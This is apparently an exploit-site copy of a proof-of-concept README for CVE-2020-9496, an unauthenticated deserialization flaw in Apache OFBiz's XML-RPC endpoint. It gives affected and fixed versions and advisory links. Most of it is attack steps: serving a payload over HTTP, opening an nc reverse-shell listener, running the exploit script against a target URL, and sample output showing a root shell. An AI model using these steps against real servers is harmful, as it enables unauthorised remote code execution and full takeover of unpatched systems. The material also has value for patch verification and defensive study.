## https://sploitus.com/exploit?id=ABCA413C-500D-5BEA-A61C-33ADF43BB2FF
# CVE-2020-9496
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz from the GitHub Security Lab team.
# Affected Version 17.12.01
# Fixed Versions 18.12.01, 17.12.04
Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's Post: https://issues.apache.org/jira/browse/OFBIZ-11716
Github's POC: https://github.com/g33xter/CVE-2020-9496
In order to make this exploit work, you will need to make the following steps:
### Step 1: Host HTTP Service with python3
```
> sudo python3 -m http.server 80
```
### Step 2: Run nc listener in the desired port (Recommended 8001)
```
> nc -nlvp 8001
```
### Step 3: Change Website's URL and Port inside the script:
```
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
```
### Step 4: Run the exploit as shown below
```
> ./cve-2020-9496.sh -i IP -p PORT
```
### Step 5: Check nc listener
```
โฏ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01#
```